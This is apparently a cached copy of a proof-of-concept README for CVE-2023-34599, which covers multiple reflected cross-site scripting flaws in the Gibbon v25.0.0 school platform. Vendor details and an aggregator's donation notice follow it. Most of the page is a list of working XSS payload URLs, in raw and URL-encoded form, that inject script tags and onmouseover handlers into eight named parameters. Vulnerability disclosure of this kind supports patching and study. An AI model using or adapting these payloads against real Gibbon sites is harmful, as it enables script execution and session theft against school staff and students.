CVE-2023-34599 PoC — Gibbon 跨站脚本漏洞

Source

https://github.com/maddsec/CVE-2023-34599

Associated Vulnerability

Title:Gibbon 跨站脚本漏洞 (CVE-2023-34599)
Description:Gibbon是一个解决教育工作者每天遇到的实际问题的学校平台。 Gibbon 25.0.0版本存在安全漏洞，该漏洞源于存在跨站脚本（XSS）漏洞，允许攻击者执行任意Javascript代码。

Description

Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.

Readme

# CVE-2023-34599
Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.

# Proof of Concept

# Parameter allUsers
http://gibbon.local/index.php?q=/modules/Timetable Admin/courseEnrolment_manage_byPerson_edit.php&gibbonPersonID=0000000001&gibbonSchoolYearID=025&type=Staff&allUsers=rcnk4'><script>alert(1)</script>lo352
http://gibbon.local/index.php?q=%2fmodules%2fTimetable%20Admin%2fcourseEnrolment_manage_byPerson_edit.php&gibbonPersonID=0000000001&gibbonSchoolYearID=025&type=Staff&allUsers=rcnk4%27%3e%3cscript%3ealert(1)%3c%2fscript%3elo352

![1](https://github.com/maddsec/CVE-2023-34599/assets/88505855/3e798bb2-433c-4114-b4ac-276042cf359d)

# Parameter currentDate
http://gibbon.local/index.php?q=/modules/Departments/department_course_class.php&gibbonCourseClassID=00002426&currentDate=ceb7h"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f74wd
http://gibbon.local/index.php?q=%2fmodules%2fDepartments%2fdepartment_course_class.php&gibbonCourseClassID=00002426&currentDate=ceb7h%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22f74wd

![2](https://github.com/maddsec/CVE-2023-34599/assets/88505855/ad2e9316-56ad-447d-8f4c-0f7256341ef9)

# Parameter gibbonCourseClassID
http://gibbon.local/index.php?q=/modules/Markbook/markbook_view.php&gibbonCourseClassID=00002425}}serbb'><script>alert(1)</script>aehos
http://gibbon.local/index.php?q=%2Fmodules%2FMarkbook%2Fmarkbook_view.php&gibbonCourseClassID=00002425%7d%7dserbb%27%3e%3cscript%3ealert(1)%3c%2fscript%3eaehos

![3](https://github.com/maddsec/CVE-2023-34599/assets/88505855/e7de9c11-9477-4c84-bd74-35c8de3c3c37)

# Parameter gibbonCourseClassID
http://gibbon.local/index.php?q=/modules/Departments/department_course_class.php&gibbonCourseClassID=00002426h6yng"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"pm6bw&currentDate=05/22/2023
http://gibbon.local/index.php?q=%2fmodules%2fDepartments%2fdepartment_course_class.php&gibbonCourseClassID=00002426h6yng%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22pm6bw&currentDate=05%2f22%2f2023

![4](https://github.com/maddsec/CVE-2023-34599/assets/88505855/f6dc683d-9422-4a06-92df-73b43cee43cd)

# Parameter gibbonPersonID
http://gibbon.local/index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001ybibn'><script>alert(1)</script>jvqhopis0qf&search=&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y
http://gibbon.local/index.php?q=%2fmodules%2fStaff%2fstaff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001ybibn%27%3e%3cscript%3ealert(1)%3c%2fscript%3ejvqhopis0qf&search=&ttDate=05%2f23%2f2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y

![5](https://github.com/maddsec/CVE-2023-34599/assets/88505855/133c393a-ba6b-4166-84cc-2f4cb2b88007)

# Parameter gibbonSchoolYearID
http://gibbon.local/index.php?q=/modules/Timetable Admin/courseEnrolment_manage_byPerson_edit.php&gibbonPersonID=0000000001&gibbonSchoolYearID=k9x9d'><script>alert(1)</script>y0uk8&type=Staff&allUsers=
http://gibbon.local/index.php?q=%2fmodules%2fTimetable%20Admin%2fcourseEnrolment_manage_byPerson_edit.php&gibbonPersonID=0000000001&gibbonSchoolYearID=k9x9d%27%3e%3cscript%3ealert(1)%3c%2fscript%3ey0uk8&type=Staff&allUsers=

![6](https://github.com/maddsec/CVE-2023-34599/assets/88505855/a6e05520-690f-4c70-b964-4e32f057362b)

# Parameter search
http://gibbon.local/index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(1)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y
http://gibbon.local/index.php?q=%2fmodules%2fStaff%2fstaff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq%27%3e%3cscript%3ealert(1)%3c%2fscript%3eoq7c8fmwwro&ttDate=05%2f23%2f2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y

![7](https://github.com/maddsec/CVE-2023-34599/assets/88505855/7f0892d3-ffa7-4e85-96a3-e0f1d65f0c9c)

# Parameter subpage
http://gibbon.local/index.php?q=/modules/Staff/staff_view_details.php&gibbonPersonID=0000000001&search=&allStaff=&subpage=Personalpy5ei<script>alert(1)</script>pkq71
http://gibbon.local/index.php?q=%2fmodules%2fStaff%2fstaff_view_details.php&gibbonPersonID=0000000001&search=&allStaff=&subpage=Personalpy5ei%3cscript%3ealert(1)%3c%2fscript%3epkq71

![9](https://github.com/maddsec/CVE-2023-34599/assets/88505855/e1d2c2f7-2b9a-441b-b5e1-715dcf1ef6c1)

# Vendor information
Name: Gibbon
URL: https://gibbonedu.org
Github repo: https://github.com/GibbonEdu/core

File Snapshot


 [4.0K]  /data/pocs/69205a4f895fd86134bc1ca3a695a2b64e9ae43c
└── [4.8K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!